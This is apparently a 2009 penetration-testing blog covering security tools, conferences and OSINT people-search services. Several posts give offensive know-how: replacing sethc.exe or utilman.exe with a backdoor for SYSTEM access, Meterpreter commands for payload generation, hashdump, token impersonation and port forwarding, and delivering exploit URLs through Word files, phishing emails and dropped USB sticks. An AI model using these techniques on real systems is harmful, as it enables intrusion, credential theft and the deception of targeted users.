Monday, November 9, 2009

Owning Windows 7 - Double hack (physical access required)


Hi all, i finished my Windows 7 upgrade and i decided to check and old trick that worked on XP and Vista, no foo required, it's an easy one:

If you have access to a Windows 7 Box, you can still replace the binary c:\windows\system32\sethc.exe by your favourite backdoor (you can insert the same binary with the meterpreter embedded) and trigger it pressing 5 times the shift key on the login screen. Also the trick works by replacing c:\windows\system32\utilman.exe, and pressing WIN-U in the login screen. (you must boot with a live CD in order to replace the binaries)

I know, i know.. if someone have access to your machine it's game over, but hey this it's still there and this could have been improved and avoid the direct calling of two binaries by a key combination.

You can see the double cmd.exe popping one for sethc.exe and the other for utilman.exe, both with "nt authority\system" privileges.


If you don't have your disk encrypted you should do it... if you have it encrypted, beware with the Evil Maid.

Enjoy,

Christian

Friday, May 8, 2009

Pangolin and your data

This will be a brief entry about a dubious behavior of Pangolin (SQL Injection Tool). Today we were checking some of the features of Pangolin, and i had special interest on the ORACLE UTL_HTPP injection, i checked the options and there wasn't a configuration for the local HTTP server, so i was wondering how the hell they got the results back.

So i started Pangolin against a test server, and there wasn't any open port in my machine, next step my coworker Javi, launched the attack and sniffed the traffic, all the injection was urlencoded+Oracle (char) encoding, after decoding we found that the results of the injection is sent to a nosec.org web server, and then Pangolin perform a GET to retrieve the data. WTH?

At least let the user know what are you doing with the data, i don't think this will make penetration testers happy, knowing that they customers data is traveling via a third party server.

Be careful where you send your data ;)

-CMM

Tuesday, April 28, 2009

Information Gathering: Delicious


Here is a new source that could help you during a Penetration Test, it's not a source that will give you results most of the times, but hey! maybe you are lucky.

Delicious is a service for keeping your bookmarks in one place (online), it's social bookmarking.

So let's go with an example; if you have some nicknames from your target, you can search directly on their Delicious profile, all their public links, for example my profile:

http://delicious.com/laramies

Remember that users can mark a link as private, but here is where we can be lucky if they forget to save it as private.

Another way of searching in Delicious, is using target company URL's or IP's, in this example i will use just a standard internal ip:

192.168.1.1

And look the second result:



The root password in the url :)

In particular cases you can obtain interesting results

-CMM

ProxyStrike Plugins update

Well this is a short post, just to let you know that the plugins framework of ProxyStrike is updated, making easier to develop your own plugins. Here is a diagram of the internal structure:


Now each plugin is a file, and here is an example of a plugin for gathering all the email addresses:

class email_detect(AttackPlugin):
def __init__(self):
AttackPlugin.__init__(self,name="email detect",variableSet=False,iface=True,type="tree",fields=["Url","Email"])

self.emailre=re.compile("[a-z0-9_.-]+@[a-z0-9_.-]+",re.I)

def process(self,req):
html
=req.response.getContent()
a
=self.emailre.findall(html)
results
=[]
for i in a:
results
.append([i])
if a:
self.putRESULTS([req.completeUrl,results])


You can find more examples inside the plugin folder, just get your copy via subversion:

svn checkout http://proxystrike.googlecode.com/svn/trunk/ proxystrike-read-only

More information in the wiki, and you can follow updates by deepbit in his new blog

Enjoy

-CMM

Monday, April 20, 2009

Meterpreter Post exploitation - Recap


I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first Meterpreter paper:

Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared ob ject (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection.


First of all, i would like to remark that i use Meterpreter as a standalone binary most of the times. To create a binary for uploading to a server you can use this command:

./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe

Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:

./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

Or inside the metasploit console:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit

Well once we have a working connection, these are some things that you can do:

-Port forwarding: You can make port redirections,

meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389

-L = ip that will hold the listening port
-l = the listening port
-h = the target host
-p = the target port

Now you should connect to the exploited machine on port 444

More on forwarding and routing here


-HashDumps:

You can get the hashes of the user accounts, like the pwdump utility, for later cracking.

meterpreter> use privs (we load the privileges module)
meterpreter> hashdump

You need Admin/System privileges to work.

-User impersonation, using the token passing technique:

You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by Luke Jennings:

meterpreter> use incognito (we load the incognito module)
meterpreter> list_tokens (we list all available sessions)
meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)

You need Admin/System privileges to work.

If you want to revert the situation an obtain your original session, you can execute:

meterpreter> rev2self

More on working with Incognito and Meterpreter at Carnal0wnage

Dumping memory to extract hashes (using mdd.exe):

Here we first need to upload mdd.exe (Mantech)

meterpreter> upload mdd.exe .
meterpreter> execute -f mdd.exe -a "-o mydump.dd"
meterpreter> download mydump.dd .

Now we need can use volatility to:

  • cachedump Dump (decrypted) domain hashes from the registry
  • hashdump Dump (decrypted) LM and NT hashes from the registry
  • hivelist Print list of registry hives
  • hivescan Scan for _CMHIVE objects (registry hives)
  • lsadump Dump (decrypted) LSA secrets from the registry

More information on using meterpreter + mdd + volatility on Attack Research blog

Another resource for Meterpreter plugins is the DarkOperator website, where we can find some modules like:

  • Disable_Audit: Disable auditing, by changing the local security policy
  • GetGui: Script for enabling RDP service on target host.
  • GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.
  • Memdump: Automation for mdd
  • WinEnum: Script that will gather a big amount of information about the host
  • Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.
  • NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.
  • Soundrecorder: Allows you to record sound on the target machine :)
  • GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.

You can find examples of these modules and the source code in the the Darkoperator website under the meterpreter zone, many of them are included in the Metasploit project.


Meterpreter service wrapper:

You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from Phreedom.org (Alexander Sotirov)

c:> metsvc.exe install-service (it will launch on port 31337)


Well that's all for now, i will like to thanks Chris Gates and Carlos Perez (DarkOperator) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others.

Also a big thanks for all the Metasploit team, for their great work.

Enjoy your post exploitation ...

-CMM

Saturday, April 11, 2009

From Oracle to the OS with Metasploit

I'm back from my vacations, and it's time write some new posts

I read an interesting article on how to obtain a shell through Oracle Database, this article was written by Alexandr Polyakov from www.dsecrg.com, they have more interesting things about Oracle penetration testing on their website.

The article explains how to obtain an OS shell, via Pass the hash technique inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea is to read a file over the network via SMB (ctxsys.context) and connect to a fake SMB server to steal the NTLM challenge-response.

The author explains the creation of a Metasploit plugin (ora_ntlm_stealer) to automate the process, so you can get it by updating your svn copy.

Here is the paper with the complete information

Enjoy

-CMM

Tuesday, March 17, 2009

ProxyStrike v2.0 released!

I'm pleased to announce a new version of ProxyStrike, an active Web Application Proxy, a tool designed to find vulnerabilities while browsing an application. It was created because the problems we faced in the pentests of web applications that heavily depends on Javascript, not many web scanners did it good at this stage, so we came with this proxy.

Right now it has available Sql injection, XSS and Server side includes.

Highlights from this release:
• Plugin engine (Create your own plugins!)
• Automatic crawl process

• Request interceptor
• Request diffing
• Request repeater
• Save/restore session
• Http request/response history
• Request parameter stats
• Request parameter values stats
• Request url parameter signing and header field signing
• Use of an alternate proxy (tor for example ;D )
• Attack logs
• Export results to HTML or XML
* Sql attacks (plugin)
• Server Side Includes (plugin)
• Xss attacks (plugin)

Check it at: http://www.edge-security.com/proxystrike.php

Here is a video of the tool:



Great Job from Carlos del Ojo (deepbit) for this new release


-CMM

Security Industry Salary and Certification Survey 2008

Sans Institute released an excellent study about the salaries in the Security industry and relations with certifications. This is a great study for the professionals to know where they are in relation with they career. I would like to see one of these studies for Europe, this one particularly covers USA.

The survey shows that the Security industry is one of less affected by the crisis, and where the companies plan to invest in this year.

If someone need help for a European version, let me know.

Download here

Here you have some interesting bits:

  • Salaries for information security professionals are high. Over 38% of respondents earn US $100,000 or more per year.

  • 41% of the respondents said their organizations use certifications as a factor when determining salary increases.

  • The overall mean funding for training was US $2,854 per year with a median of US $2,000 per year.

  • Digital forensics, intrusion detection, and penetration testing are the technical topics respondents are most interested in learning in 2009.

  • As of late November 2008, just over 79% of respondents forecast no information security personnel reductions in the next 12 months.

  • Over 25% of respondents plan to deploy the following technologies in 2009:

    • Configuration Management
    • SIEM (Security Information and Event Management)
    • Storage Security
    • Wireless Security Solutions
  • The best places to find an information security position are in the metro areas of Las Vegas, Nevada; Dallas, Texas; and Washington, DC.

-CMM

A fresh new look into Information Gathering v2

Here is the new version of my presentation "A fresh new look into Information Gathering v2" that i presented at FIST Conference Barcelona one week ago. It's a overview of some new sources and mostly based on Metadata and Metagoofil V2 (coming soon)

If you have some new source or technique that want to share, you are welcome :)

Download here

Enjoy

-CMM

Monday, March 16, 2009

SOURCE BOSTON experience

I recently came back from Boston were i attended to the SOURCE Conference Boston.

It was really a good conference, an excellent speaker line up, and a great environment to do networking and meet new people from the industry.

The conference had a great balance between technical talks and business talks, addressing all the needs of a security professional.

The conference started with an excellent speech by Peter Kuper, who gave his vision about the security market in these turbulent times. (speech transcript here).

Then during the conference, i attended the followings talks:

How Microsoft fixes security Vulnerabilities, interesting insight about what happens behind the courtain of a security update.

Politically Motivated Denial of Service Attacks, Jose Nazario.

Mac OS Xploitation, Dino Dai Zovi (Dino promised to transform OSX in a first class citizen in Metasploit)

Attacking Layer 8: Client Side penetration testing, Chris Gates and Vince Marvelli. They show how easy is to own the end user.

DNS: Towards the Secure Infrastructure, Dan Kaminsky. This was the same presentation as DC.

Day 2:

L0phtCrack 6 Release

400 apps in 40 days, Sahba Kazerooni. He explained how he faced a weird project of 400 applications in 40 days.

Get rich or Die Trying, Jeremiah Grossman. A cool talk on how to earn money exploiting different application vulnerabilities.

Vulnerabilities in Application Interpreters and Runtimes. Erik showed some vulnerabilities on different widely deployed interpreters and runtimes.

Day 3:

Dissecting Foreign Web Attacks, Val Smith. Val analyzed a web attack from start to end, great info in his talk.

That's all for 3 days.

Greets to Chris Gates, Vince Marvelli, Val Smith, Jose Nazario, Stacy Thayer, Christien Rioux, and everyone that i met at Boston.

Now SOURCE Barcelona is next, in the coming days we will launch the Call for papers, don't miss this great conference in this great city :)

-CMM

Friday, March 6, 2009

Fist Conference - Source Boston

The FIST Conference is over, i just came home and now i'm preparing my backpack for tomorrows trip to NY and Boston, were i will attend SOURCE Conference Boston :)

The talk of Jay Libove was very interesting, he made us think over the ethics in our career, and
Vicente Diaz talk about eCrime economy showin
g some unbelievable facts and numbers, we are really outnumbered... My talk was about Information Gathering, Metadata and Social Networks, showing how easy is to obtain information about individuals and companies.

The slides will be available soon at www.fistconference.org

Here is a screenshot of the next Metagoofil version that i showed today:






Yes it has the "Analyze local files" that many of you asked for :)

-CMM

Thursday, March 5, 2009

Warvox: Wardialing refreshed




The people of Metasploit released a new tool for performing Wardialing attacks. You must be wondering why a new wardialing tool in these times?

Well they came with a new idea, on using Voip services to perform the scans and they claim to reach 10.000 numbers in 8 hours aprox. No modem needed, yes you read right.

One of the great things about the WarVOX model is that once the data has been gathered, it is archived and available for re-analysis as new signatures, plugins, and tools are developed.
Also is interesting the analysis they perform, because they identify more things than a modem attached to a telephone line:

This model allows WarVOX to find and classify a wide range of interesting lines, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders. WarVOX provides the unique ability to classify all telephone lines in a given range, not just those connected to modems, allowing for a comprehensive audit of a telephone system.


The tool is coded in ruby and you can download here

-CMM

Tuesday, March 3, 2009

Quick tip: Sharing a directory over the web easily

Sometimes you need to share a file, show someone a file, serve a client side exploit in a local network, but you don't have a web server on your machine, or don't want to upload the file to a server... Here is a very useful tip to run a web server serving the actual directory with Python:

shell>python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"

there is an easier way:

shell>python -m SimpleHTTPServer

By the default it will use the port 8000.

You can create an alias for easy launching

More shell tricks in Shell-fu.org

-CMM

Monday, March 2, 2009

Client Side exploit Delivery - Word files


Today i will do a brief post about how you can deliver an exploit URL to your target.
I was reading the SANS storm post about MS09-002 XML/DOC initial infection vector, and i wanted to try it. Here is the information from SANS:



After many failed attempts and some research, i stumble and old post about a XSS in Word documents where the steps to accomplish the XSS where:



The html file content:


So if you change the value code by your exploit serving URL, you will get your exploit served when the target open the Word document.

In this example i changed the value by "http://www.google.com" and the results when opening the word file:


And in the next page is the little frame with the page loaded:


For doing it in a cleaner way, your page will be blank, so there will be no trace at plain sight for a typical user. Also it's possible to play with the object size and location. Also depending on the configuration the user will receive an alert saying that an Activex is trying to run.

So for your next penetration test when you need to perform a targeted client side attack, fire up Metasploit, setup MS09-002 build a Word file, send emails with juicy Subjects , leave some USB sticks on the building and wait :)

-CMM

Sunday, March 1, 2009

L0phtCrack is back with L0pht

I read via Christien Rioux twitter, that L0phtCrack is being reacquired by the original authors.

They are preparing a special information session at SOURCE Boston (Thursday 10:15 am), and they will be releasing version 6. Also they will explain the story of the product from the days of L0pht, @stake, Symantec and L0pht again.

Check this site for more info soon.

I will be there for this session!


-CMM

Thursday, February 26, 2009

15 Minutes Penetration test

Here you have two interesting videos from Ryan Linn on EthicalHacker.net , reviewing a fast Penetration Test using Nmap, Nessus, Metasploit / Meterpreter and Ophcrack.

Video part 1 Nmap, Nessus, Metasploit
Video part 2 Meterpreter, Ophcrack, Command line users

This is a good time to say how much i like meterpreter :)

Enjoy

-CMM

Wednesday, February 25, 2009

Google Safe Browsing Diagnostic


Today i read about Google Safe Browsing Diagnostic report, and it's really interesting.

Google is providing a security diagnostic report about web sites, where they give:

*What is the current listing status for [the site in question]?

We display the current listing status of a site and also information on how often a site or parts of it were listed in the past.

*What happened when Google visited this site?

This section includes information on when we analyzed the page, when it was last malicious, what kind of malware we encountered and so fourth. To help web masters clean up their site, we also provide information about the sites that were serving malicious software to users and which sites might have served as intermediaries.

*Has this site acted as an intermediary resulting in further distribution of malware?

Here we provide information if this site has facilitated the distribution of malicious software in the past. This could be an advertising network or statistics site that accidentally participated in the distribution of malicious software.

*Has this site hosted malware?

Here we provide information if the the site has hosted malicious software in the past. We also provide information on the victim sites that initiated the distribution of malicious software.

This service is very useful and is similar to McAfee Site Advisor, you can check an example report for doubleclick.net here where in the past malware was detected.

This report is what google knows about the security of a site, better said the potential security risks that you can find in a site.

You can access this service via the website, or via Firefox "additional information"

More information in the Google blog

-CMM

FIST Conference Barcelona March 2009


Next March 6th we are throwing a new edition of the FIST Conference here in Barcelona, so if you want to check the program, you can go here

I will give a talk about "A fresh new look into information gathering", where i intend to present the new beta version of the Metagoofil, and some new sources for Information Gathering.

Vicente Díaz will continue the talk he gave at the last FIST Conference with new information and facts about cyber crime and the business behind it (or in front of it), very interesting and entertaining talk.

The location has changed, and this edition will be inside the FiberParty 2009 event.

After the conference we flight to USA, first NY and then we head to BOSTON, to attend SOURCE Conference.

Please join us at FIST Conference :)

-CMM

Thursday, February 19, 2009

Black Hat DC 2009 - Slides


The presentations of the last Black Hat DC conference are available online, here are some interesting talks:

  • DNS 2008 and the New (old) Nature of Critical Infrastructure, Dan Kaminsky
  • Windows Vista Security Internals, Michael Mukin
  • Dissecting web attacks, Val Smith & Colin Ames

You can download the presentations here

Enjoy
-CMM

Monday, February 16, 2009

Fast-Track - Automated penetration testing suite


Fast-track is
"a compilation of custom developed tools that allow penetration testers the ease of advanced penetration techniques in a relatively easy manner"

Fast-Track has tools for MSSQL server, SQL Injection, Metasploit Autopwn Automation, Mass Client Side attacks, exploits and a Payload generator.

The idea is to provide easy and fast to use tools, that will usually take you many steps, or some minor coding on existing tools. I liked the integration with Metasploit payloads.

It's like executing scripts and tools combos :)

You can check a video of the SQLPwnage module in action:


Fast-Track SQLPwnage from David Kennedy on Vimeo

Presentation of Fast-Track at ShmooCon 2009, here
Download here

Enjoy

-CMM

Wednesday, February 11, 2009

CUDA and bruteforcing

Did you hear about Pyrit?

"Pyrit is implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff"

Pyrit exploit the power of the new GPU, like the Nvidia family that support CUDA.

"CUDA is the compute engine in NVIDIA graphics processing units or GPUs, that is accessible to software developers through industry standard programming languages"
Just look at this comparison of pyrit running on different graphic cards:




Well I wanted to know the performance of my GPU's, so i did some test on my Macbook Pro unibody, that has two Nvidia graphic cards on board, and here are the results:

Nvidia 9400 M


Nvidia 9600 GT



With the 9400 M i got 690.67PMK/s  more than 2x of the CPU Core2duo 2.4Ghz, and with the 9600 GT i got 912.77 PMK/s almost 4x !!  

Now it will be sweet to have both graphic cards working at the same time ;)

Pyrit is included in Backtrack  4 and in the next Pentoo release!

Also i tested another CUDA based bruteforcer, "Multihash Bruteforcer":

The world's fastest cross-platform MD4/MD5/NTLM cracking
 for Windows/Mac/Linux

Here are the results on my Macbook Pro:



I guess that this tool will improve over time, but they are giving great results right now.

Enjoy your password cracking

-CMM

Backtrack 4 is here! - Cuda support


The new Backtrack 4 beta is out!, you can download your ISO here, also you can check the backtrack 4 info on their blog.

The most interesting feature is that is based on Ubuntu, this mean that will be easy to update, maintain, create packages, etc!  The Backtrack team wants that besides of being your live CD, to be your every day desktop, and with this change i think that a lot of users will make the change.

Another feature is the support for pyrit and CUDA, to exploit the power of the GPU's.

Enjoy 

-CMM



Tuesday, February 10, 2009

Web Services Security testing

Last week  i had to perform a penetration test on a Web Services environment and during the project i found the following interesting documents:

SIFT  - Web Services Security Testing Framework  V1  - by SIFT  Link

This document is a great resource.

Web Services Security  - by Bilal Saddiqui Link

Exploring Web Services Encryption - by Bilal Saddiqui   Link

More on Web Services Encryption - by Schmoil Link

Seguridad en Servicios Web (Spanish) - by Oscar Gonzales Link

About the tools, i had some trouble with the usual hacking tools, we didn't had UDDI or JUDDI, so we had to hack the application server (Jboss) and then access the Web services admin panel, to get the WSDL.

With the WDSL i proceed to perform some bruteforce attacks with WebSlayer to find a valid username and password for the WS-Security (client authentication).

The other tool that i used was Appscan, Web Services Power tools that allowed me to get the descriptions, and perform request, but i didn't liked the way it handle the raw request...

Another interesting tools is the SOAPUI, the web services testing tool, it's very complete and i'm still learning on how to use it....

Also we used WSFuzzer from OWASP. Here is a video on how to use it

UPDATE:


Any other interesting tools or document?

-CMM

Friday, January 30, 2009

Protecting users from password theft

A very good article from Chris Eng (Veracode), about how developers can design a strong password scheme in the applications to protect users from password theft. 

Suppose that your database is stolen (hope no) is  the data protected? the thiefs could revert back the passwords easily?  In my lasts pentest the passwords were stored in clear texts..... so it's common practice to have the password stored in an insecure way, or even clear text.

Here is a good practice for your developers or customers:

Veracode - How to protect your users from password theft

-CMM

Wednesday, January 28, 2009

PCI for dummies


Qualys, the leader provider of vulnerability scans, has published a free e-book entitled "PCI for dummies", if you want to get a grasp of what it is the PCI (Payment Card Industry), and learn how to comply with it, you can download your copy here:


Enjoy 

-CMM

DVL 1.5 - a hacking playground


A new version of the most vulnerable distribution was released yesterday. This Linux distribution is known for providing resources to learn security and hacking.  It's loaded with training material, vulnerable software, and tools. 

It's a very interesting distribution to have in your lab, for testing
your tools in a controlled environment.

The new version 1.5 (Infectious disease) it's a 1.6 GB ISO image, and it's available to download here

Happy hacking

-CMM

Web Application vulnerability scanners comparison

Today a saw a message from "Anantasec" in the mailing "pen-test" about a evaluation/comparison of Web Application scanners. 

The products analyzed are IBM Appscan (7.7.620 SP2), HP Webinspect (7.7.869)  and Acunetix (6.0), all commercial products.

The analysis only evaluate the results of the scans against 16 applications, it doesn't compare features, options or capabilities of the products.

After reading the report i have some doubts about the origin of it. Maybe could be a biased analysis for Acunetix? It's an Anonymous writer, a blog with just one post.. it makes me wonder. (damn, no interesting metadata in the document )

Personally i used all the scanners and i'm happy with Appscan, i'm missing the scheduling option of Webinspect. Also Acunetix improved a lot in the latest versions, and could be an interesting option when considering price/value.

An interesting fact of the analysis is that each of the scanners performed better when scanning the demo application of their company :)
 
Here is the report from Anantasec, draw your own conclusions

Remember to use more than one tool for the task, to have complimentary result, and also that the scanner will not discover all the vulnerabilities on the application, so don't rely on them.

I always use ProxyStrike when doing the manual analysis of the application, and i discover XSS and SQL that none of the scanners mentioned before does. Btw a new version is coming!

If you want more options on Web application scanners don't forget the Open Source options, right now there is a clear leader in this field, W3aF, it's very complete and even have more plugins or checks than the commercials one, and is multi-platform.

What are you using?

-CMM

Tuesday, January 27, 2009

Information Gathering III: Yasni and 123people


After the posts about Information Gathering about individuals using Spokeo and Pipl, now it's the turn of Yasni and 123People.


has an standard search page, where you have to put the name of the person you want to search information about. The result page is organized in "All, Personal, Business, News, Other Web pages and Comments", and the quantity and quality of the results is very good.

An interesting feature of Yasni is the Tag cloud about your target, in some cases is useful to check if it is really your target (assuming you know something about him/her).

Yasni also offers an "Agent search", which they say it will perform an exhaustive deep web search, and will return the results in 24 hours. I'm waiting for the firsts examples to arrive :)

The last people search engine i will review in this miniseries is "123people", one of the most used service on the net, and personally one of the best in the results organization. 

123 people results are organized in "web links, Amazon, Phone Numbers, Videos, News, Microblogs, Pictures, Blogs and Documents, and Social network profiles", 123people also has a Tag cloud like Yasni. 

123People has an email alert service, for receiving updates about your targets.

Right now we can say that the results are very similar between  the different services and we have to wait to see which will reign the people search engine terrain.

I have my preferences with 123people and Pipl,  but i recommend to use as much as possible when  performing an information gathering about a target.  All this services are oriented to the web and the social networks, there are other kind of services that will provide more information but they aren't free and the information is only available for certain countries, i will write a post about this services soon.

What's is your choice? 

-CMM
 

Thursday, January 22, 2009

Information Gathering II : Pipl.com


Well after writing about Informationg Gathering and Spokeo, now it's the turn of Pipl.com as you can tell from the name is oriented to search information about individuals.

The application doesn't need a registration, this is good, and the search parameters that you can use is the Name, Last Name, City and Country, but also they  recently added the reverse lookup, where you can use an email address, nickname or phone number!

As usual i started searching for myself, and Pipl shielded more results than Spokeo. In the results we can find online profiles (Facebook, Myspace, etc), photo albums, Youtube accounts, Amazon accounts, blog posts, documents, pictures (with thumbnails) and many other kind of results.

Really is an interesting tool, and is improving over the time.

About the differences between Spokeo and Pipl, is that Spokeo aim to be more of a tracking tool of what is your "friends" doing, than  a one shot search and investigation. Also Spokeo just allow you to do 1 free check, and if you want more you must pay.

Finally one thing that i would like to see in these tools is an API to automate the search, and stop worrying about the changes in the results and the performance of my parsers.

Stay tuned because there are two new contenders in the arena of people search that i am testing this week.
 
Enjoy your investigations ;)

-CMM

Wednesday, January 21, 2009

HITB 2008 videos

The videos of the Hack In The Box Conference 2008 are available through Bittorrent, you can download the torrent here:


Also remind that you can download the slides from here

-CMM

Information Gathering I : Spokeo


Hi all,  i was researching new information gathering sources when i stumble with a website called Spokeo, in their website they claim that it "searches deep within 41 major social networks to find truly mouth-watering news about friends and coworkers", well it seems it's oriented to the gossip world, what everybody loves ;)

After seeing this promising prospect i decide to take a look and try this application, the main option is that you log in with your email account, and Spokeo will retrieve all your contacts and start gathering info about them, that's is not gonna happen in the this test; i prefer to search for a contact using an email address or a blog url.

So i launched a search with myself hoping for a good set of results.... but it was a great disappointing, Spokeo returned a very poor result set, well i though that maybe with other users i will have more results... but no, nothing at all, less info than before.

Maybe  if you allow the use of the API login, with your credentials will shield more results, but i didn't try this option yet.

A curious fact is that Spokeo has created a marketing campaign addressed at Human Resources people with "Spokeo HR", allowing the recruiters to perform an online profile of the candidate.

So it turned to be a good promise with disappointing results.

Do you have any feedback from this application?

Which other application do you recommend?

-CMM

Tight Budget, conferences and training

Here is an interesting old article from August Blegen, about "Why attend conferences when facing tight budgets" aka recession times, crisis or whatever you like to call the times we are facing. The article perform an analysis on why is important to attend conferences (and professional education) during hard times. I liked this part of the article:

Recession is not a time to pull the cover over and crawl in. It's a time to work harder, work smarter and improve your own development just to maintain your competitiveness.


So if you are very tight on budget here in Barcelona  or Madrid we organize the FIST Conference a free security conference, where you can learn new things and meet new people.

And i recommend to start saving to assist to the SOURCE conference that will take place on Barcelona on September! This will be an awesome event
 
You can read the whole article here

How are you gonna face the training/education this year?

-CMM

Zerowine: Malware behavior analysis

Here is a new project aimed to dinamically analyze the behavior of malware. The twist here is that Zerowine will run the malware sample using WINE in a safe virtual sandbox collecting information about the API's called by the sample.

Zerowine is distributed as a QEMU virtual machine with a Debian OS. In the virtual machine is installed Zerowine with a web interface to upload malware samples, check the status of the analysis and finally to present the report.

Here are some screenshots:



Project page: Zerowine
Enjoy
-CMM

Monday, January 19, 2009

About Windows passwords, hashes and registry

Here is a great set of articles about Windows passwords schemes by 

Syskey and the Sam:
http://moyix.blogspot.com/2008/02/syskey-and-sam.html

Decrypting LSA Secrets:
http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html


Cached Domain Credentials:
http://moyix.blogspot.com/2008/02/cached-domain-credentials.html

Besides the articles, Brendan create a set of tools to use with Volativility that will allow to extract those password from a memory dump:

  • hashdump: dump the LanMan and NT hashes from the registry (deobfuscated). 
  • lsadump: dump the LSA secrets (decrypted) from the registry. 
  • cachedump: dump any cached domain password hashes from the registry. This will obviously only work if the memory image comes from a machine that was part of a domain. 
Enjoy
-CMM

Wednesday, January 14, 2009

Top 25 Most dangerous coding errors

A joint effort between CWE (Common Weakness Enumeration) and SANS, and with the participation of experts in the field, produced the "Top 25 most dangerous coding errors"  a list of the most significant programming errors that can lead to serious software vulnerabilities, this document will impact in many areas like:

  • Software buyers will be able to buy much safer software. ( with a certificate of code beign free of these 25 bugs)
  • Programmers will have tools that consistently measure the security of the software they are writing.
  • Colleges will be able to teach secure coding more confidently.
  • Employers will be able to ensure they have programmers who can write more secure code. 
"The main goal of the Top 25 list is to stop vulnerabilities at the source by educating programmers on how to eliminate all-too-common mistakes before software is even shipped."

This is a good initiative to have a very brief list of programming errors, so the programmers could use as a guide, the language and examples used are very easy to understand and i guess this will facilitate the adoption by the programmers.

There is a lot of information about secure coding at OWASP, but i guess that this simple guide will be easier to use, than OWASP documentation.

Hope programmers start to use it :)

You can check the list here

-CMM



Tuesday, January 13, 2009

OWASP Testing Guide v3.0

The new testing guide was released the 18 of December, this is a great project, and very useful for penetration testers.  This version is very complete and is more clean than the previous versions.

You can download here:


-CMM

Yara Malware Classification tool

A new Malware classification tool is on the block, YARA is a tool aimed at helping malware researchers to identify and classify malware samples. 

YARA is multi-platform, running on Windows, Linux and Mac OS X, and can be used through its command-line interface or from your own Python scripts using the yara-python extension.


-CMM

Monday, January 12, 2009

Recruiting and Managing Geeks

Via CarnalOwnage i found a very interesting link about recruiting Geeks or technology savvy candidates. The article is called "Open letter from geeks to IT recruiters" and it gives tips to recruiters on how they have to evaluate a candidate for IT. There is also a part about managing Geeks, and that part is more interesting from my point of view.

Here are some tips they gave about managing Geeks:

  • Try to measure productivity in output and not in hours. (article)
  • Assign tasks to the geeks who are most interested in them, not the ones with the most experience.
  • Segregate the corporate, compensatory hierarchy from the leadership hierarchy. Basically this mean that the Geeks will organize in a meritocracy, following the group guru. In my opinion not always will be this way, but a halfway option could be good.

I would like to add some others:
  • Allow them to work remotely.
  • Don't impose absurd procedures, that consume time.
  • Listen to their opinions usually they have very good alternatives or ideas, they are problem solvers and like challenges.
  • Don't impose online content control/management, they are the "online generation", if they are productive why to worry if they are chatting or browsing the net. Most of the times they will be reading information that will improve their work and knowledge, and this is good for you.
  • Give recognition, most of the business today relay on their work, stop and think again how much of your business relay on their work. Management tend to know the work of the geeks when things goes bad, what about of recognize them when everything goes smooth ?
  • Don't burn them, they will leave, they do not tend to stay as other kind of employees.
  • Give them the correct equipment, why people don't understand that a 3 year old computer is not adequate for doing the job in conditions? It's true that they work but they performance is awful and that will demotivate the geek. They spend the whole day working with the computer, usually multitasking,  go and buy them a good and powerful computer, with a big screen or multiple screen setup, productivity will boost... and remember 19" is not a big screen...
  • Let them wear casual clothes in your company, they are not too friends of the tie. But they understand that if the need to go to customer office is necessary to wear the suit.
  • Provide them with a creative environment.
  • Give them training, they will take advantage of it.

Some of this are taken from the "How not to lead geeks".

Do you have other tips?

Links:  


-CMM